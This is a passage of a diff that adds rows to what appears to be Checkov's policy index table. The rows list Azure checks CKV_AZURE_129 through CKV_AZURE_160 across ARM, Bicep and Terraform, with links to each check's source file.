+| 1953 | CKV_AZURE_129            | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure that MariaDB server enables geo-redundant backups                                                                                                                                                 | arm                     | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py)                                                                                           |
+| 1954 | CKV_AZURE_129            | resource                         | Microsoft.DBforMariaDB/servers                                                                   | Ensure that MariaDB server enables geo-redundant backups                                                                                                                                                 | Bicep                   | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py)                                                                                           |
+| 1955 | CKV_AZURE_129            | resource                         | azurerm_mariadb_server                                                                           | Ensure that MariaDB server enables geo-redundant backups                                                                                                                                                 | Terraform               | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MariaDBGeoBackupEnabled.py)                                                                               |
+| 1956 | CKV_AZURE_130            | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | arm                     | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                                                                   |
+| 1957 | CKV_AZURE_130            | resource                         | Microsoft.DBforPostgreSQL/servers                                                                | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | Bicep                   | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py)                                                                                   |
+| 1958 | CKV_AZURE_130            | resource                         | azurerm_postgresql_server                                                                        | Ensure that PostgreSQL server enables infrastructure encryption                                                                                                                                          | Terraform               | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLEncryptionEnabled.py)                                                                       |
+| 1959 | CKV_AZURE_131            | resource                         | azurerm_security_center_contact                                                                  | Ensure that 'Security contact emails' is set                                                                                                                                                             | Terraform               | [SecurityCenterContactEmails.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py)                                                                       |
+| 1960 | CKV_AZURE_131            | parameter                        | secureString                                                                                     | SecureString parameter should not have hardcoded default values                                                                                                                                          | arm                     | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py)                                                              |
+| 1961 | CKV_AZURE_131            | parameter                        | string                                                                                           | SecureString parameter should not have hardcoded default values                                                                                                                                          | Bicep                   | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bicep/checks/param/azure/SecureStringParameterNoHardcodedValue.py)                                                          |
+| 1962 | CKV_AZURE_132            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | arm                     | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                                                               |
+| 1963 | CKV_AZURE_132            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | Bicep                   | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py)                                                                               |
+| 1964 | CKV_AZURE_132            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes                                                                                                             | Terraform               | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisableAccessKeyWrite.py)                                                                   |
+| 1965 | CKV_AZURE_133            | resource                         | Microsoft.Network/frontdoorWebApplicationFirewallPolicies                                        | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                               | arm                     | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py)                                                                                   |
+| 1966 | CKV_AZURE_133            | resource                         | Microsoft.Network/frontdoorWebApplicationFirewallPolicies                                        | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                               | Bicep                   | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py)                                                                                   |
+| 1967 | CKV_AZURE_133            | resource                         | azurerm_frontdoor_firewall_policy                                                                | Ensure Front Door WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                               | Terraform               | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FrontDoorWAFACLCVE202144228.py)                                                                       |
+| 1968 | CKV_AZURE_134            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | arm                     | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)                                                             |
+| 1969 | CKV_AZURE_134            | resource                         | Microsoft.CognitiveServices/accounts                                                             | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | Bicep                   | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py)                                                             |
+| 1970 | CKV_AZURE_134            | resource                         | azurerm_cognitive_account                                                                        | Ensure that Cognitive Services accounts disable public network access                                                                                                                                    | Terraform               | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CognitiveServicesDisablesPublicNetwork.py)                                                 |
+| 1971 | CKV_AZURE_135            | resource                         | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies                               | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                      | arm                     | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py)                                                                                 |
+| 1972 | CKV_AZURE_135            | resource                         | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies                               | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                      | Bicep                   | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py)                                                                                 |
+| 1973 | CKV_AZURE_135            | resource                         | azurerm_web_application_firewall_policy                                                          | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell                                                                                                      | Terraform               | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGatewayWAFACLCVE202144228.py)                                                                     |
+| 1974 | CKV_AZURE_136            | resource                         | azurerm_postgresql_flexible_server                                                               | Ensure that PostgreSQL Flexible server enables geo-redundant backups                                                                                                                                     | Terraform               | [PostgreSQLFlexiServerGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLFlexiServerGeoBackupEnabled.py)                                                   |
+| 1975 | CKV_AZURE_137            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure ACR admin account is disabled                                                                                                                                                                     | arm                     | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py)                                                                                           |
+| 1976 | CKV_AZURE_137            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure ACR admin account is disabled                                                                                                                                                                     | Bicep                   | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py)                                                                                           |
+| 1977 | CKV_AZURE_137            | resource                         | azurerm_container_registry                                                                       | Ensure ACR admin account is disabled                                                                                                                                                                     | Terraform               | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAdminAccountDisabled.py)                                                                               |
+| 1978 | CKV_AZURE_138            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensures that ACR disables anonymous pulling of images                                                                                                                                                    | arm                     | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py)                                                                                         |
+| 1979 | CKV_AZURE_138            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensures that ACR disables anonymous pulling of images                                                                                                                                                    | Bicep                   | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py)                                                                                         |
+| 1980 | CKV_AZURE_138            | resource                         | azurerm_container_registry                                                                       | Ensures that ACR disables anonymous pulling of images                                                                                                                                                    | Terraform               | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRAnonymousPullDisabled.py)                                                                             |
+| 1981 | CKV_AZURE_139            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure ACR set to disable public networking                                                                                                                                                              | arm                     | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py)                                                                             |
+| 1982 | CKV_AZURE_139            | resource                         | Microsoft.ContainerRegistry/registries                                                           | Ensure ACR set to disable public networking                                                                                                                                                              | Bicep                   | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py)                                                                             |
+| 1983 | CKV_AZURE_139            | resource                         | azurerm_container_registry                                                                       | Ensure ACR set to disable public networking                                                                                                                                                              | Terraform               | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py)                                                                 |
+| 1984 | CKV_AZURE_140            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure that Local Authentication is disabled on CosmosDB                                                                                                                                                 | arm                     | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py)                                                                                       |
+| 1985 | CKV_AZURE_140            | resource                         | Microsoft.DocumentDB/databaseAccounts                                                            | Ensure that Local Authentication is disabled on CosmosDB                                                                                                                                                 | Bicep                   | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py)                                                                                       |
+| 1986 | CKV_AZURE_140            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure that Local Authentication is disabled on CosmosDB                                                                                                                                                 | Terraform               | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py)                                                                           |
+| 1987 | CKV_AZURE_141            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS local admin account is disabled                                                                                                                                                               | arm                     | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py)                                                                                               |
+| 1988 | CKV_AZURE_141            | resource                         | Microsoft.ContainerService/managedClusters                                                       | Ensure AKS local admin account is disabled                                                                                                                                                               | Bicep                   | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py)                                                                                               |
+| 1989 | CKV_AZURE_141            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS local admin account is disabled                                                                                                                                                               | Terraform               | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py)                                                                                   |
+| 1990 | CKV_AZURE_142            | resource                         | azurerm_machine_learning_compute_cluster                                                         | Ensure Machine Learning Compute Cluster Local Authentication is disabled                                                                                                                                 | Terraform               | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py)                                                                                                 |
+| 1991 | CKV_AZURE_143            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster nodes do not have public IP addresses                                                                                                                                                 | Terraform               | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py)                                                                               |
+| 1992 | CKV_AZURE_144            | resource                         | azurerm_machine_learning_workspace                                                               | Ensure that Public Access is disabled for Machine Learning Workspace                                                                                                                                     | Terraform               | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py)                                                                                                 |
+| 1993 | CKV_AZURE_145            | resource                         | Microsoft.Web/sites                                                                              | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | arm                     | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                                         |
+| 1994 | CKV_AZURE_145            | resource                         | Microsoft.Web/sites                                                                              | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Bicep                   | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                                         |
+| 1995 | CKV_AZURE_145            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | arm                     | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                                         |
+| 1996 | CKV_AZURE_145            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Bicep                   | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py)                                                                                         |
+| 1997 | CKV_AZURE_145            | resource                         | azurerm_function_app                                                                             | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1998 | CKV_AZURE_145            | resource                         | azurerm_function_app_slot                                                                        | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 1999 | CKV_AZURE_145            | resource                         | azurerm_linux_function_app                                                                       | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 2000 | CKV_AZURE_145            | resource                         | azurerm_linux_function_app_slot                                                                  | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 2001 | CKV_AZURE_145            | resource                         | azurerm_windows_function_app                                                                     | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 2002 | CKV_AZURE_145            | resource                         | azurerm_windows_function_app_slot                                                                | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                             |
+| 2003 | CKV_AZURE_146            | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server                                                                                                                    | Terraform               | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py)                                                       |
+| 2004 | CKV_AZURE_147            | resource                         | azurerm_postgresql_server                                                                        | Ensure PostgreSQL is using the latest version of TLS encryption                                                                                                                                          | Terraform               | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py)                                                                               |
+| 2005 | CKV_AZURE_148            | resource                         | azurerm_redis_cache                                                                              | Ensure Redis Cache is using the latest version of TLS encryption                                                                                                                                         | Terraform               | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py)                                                                               |
+| 2006 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | arm                     | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                           |
+| 2007 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Bicep                   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                           |
+| 2008 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | arm                     | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                           |
+| 2009 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Bicep                   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                           |
+| 2010 | CKV_AZURE_149            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform               | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                               |
+| 2011 | CKV_AZURE_149            | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform               | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                               |
+| 2012 | CKV_AZURE_150            | resource                         | azurerm_machine_learning_compute_cluster                                                         | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0                                                                                                                                           | Terraform               | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py)                                                                             |
+| 2013 | CKV_AZURE_151            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Windows VM enables encryption                                                                                                                                                                     | arm                     | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                                                               |
+| 2014 | CKV_AZURE_151            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Windows VM enables encryption                                                                                                                                                                     | Bicep                   | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                                                               |
+| 2015 | CKV_AZURE_151            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Windows VM enables encryption                                                                                                                                                                     | Terraform               | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py)                                                                                   |
+| 2016 | CKV_AZURE_152            | resource                         | azurerm_api_management                                                                           | Ensure Client Certificates are enforced for API management                                                                                                                                               | Terraform               | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py)                                                                         |
+| 2017 | CKV_AZURE_153            | resource                         | Microsoft.Web/sites                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | arm                     | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                                           |
+| 2018 | CKV_AZURE_153            | resource                         | Microsoft.Web/sites                                                                              | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Bicep                   | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                                           |
+| 2019 | CKV_AZURE_153            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | arm                     | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                                           |
+| 2020 | CKV_AZURE_153            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Bicep                   | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py)                                                                                           |
+| 2021 | CKV_AZURE_153            | resource                         | azurerm_app_service_slot                                                                         | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform               | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                               |
+| 2022 | CKV_AZURE_153            | resource                         | azurerm_linux_web_app_slot                                                                       | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform               | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                               |
+| 2023 | CKV_AZURE_153            | resource                         | azurerm_windows_web_app_slot                                                                     | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform               | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                               |
+| 2024 | CKV_AZURE_154            | resource                         | azurerm_app_service_slot                                                                         | Ensure the App service slot is using the latest version of TLS encryption                                                                                                                                | Terraform               | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py)                                                                                     |
+| 2025 | CKV_AZURE_155            | resource                         | Microsoft.Web/sites                                                                              | Ensure debugging is disabled for the App service slot                                                                                                                                                    | arm                     | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                                                   |
+| 2026 | CKV_AZURE_155            | resource                         | Microsoft.Web/sites                                                                              | Ensure debugging is disabled for the App service slot                                                                                                                                                    | Bicep                   | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                                                   |
+| 2027 | CKV_AZURE_155            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure debugging is disabled for the App service slot                                                                                                                                                    | arm                     | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                                                   |
+| 2028 | CKV_AZURE_155            | resource                         | Microsoft.Web/sites/slots                                                                        | Ensure debugging is disabled for the App service slot                                                                                                                                                    | Bicep                   | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py)                                                                                   |
+| 2029 | CKV_AZURE_155            | resource                         | azurerm_app_service_slot                                                                         | Ensure debugging is disabled for the App service slot                                                                                                                                                    | Terraform               | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py)                                                                       |
+| 2030 | CKV_AZURE_156            | resource                         | azurerm_mssql_database_extended_auditing_policy                                                  | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs                                                                                                    | Terraform               | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py)                                                             |
+| 2031 | CKV_AZURE_157            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                                                                                                                   | arm                     | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py)                                                     |
+| 2032 | CKV_AZURE_157            | resource                         | Microsoft.Synapse/workspaces                                                                     | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                                                                                                                   | Bicep                   | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py)                                                     |
+| 2033 | CKV_AZURE_157            | resource                         | azurerm_synapse_workspace                                                                        | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                                                                                                                   | Terraform               | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py)                                         |
+| 2034 | CKV_AZURE_158            | resource                         | Microsoft.Databricks/workspaces                                                                  | Ensure Databricks Workspace data plane to control plane communication happens over private link                                                                                                          | arm                     | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py)                                                                             |
+| 2035 | CKV_AZURE_158            | resource                         | Microsoft.Databricks/workspaces                                                                  | Ensure Databricks Workspace data plane to control plane communication happens over private link                                                                                                          | Bicep                   | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py)                                                                             |
+| 2036 | CKV_AZURE_158            | resource                         | azurerm_databricks_workspace                                                                     | Ensure Databricks Workspace data plane to control plane communication happens over private link                                                                                                          | Terraform               | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py)                                                                 |
+| 2037 | CKV_AZURE_159            | resource                         | azurerm_function_app                                                                             | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform               | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                             |
+| 2038 | CKV_AZURE_159            | resource                         | azurerm_function_app_slot                                                                        | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform               | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                             |
+| 2039 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | arm                     | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                                   |
+| 2040 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Bicep                   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                                   |
+| 2041 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | arm                     | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                                   |
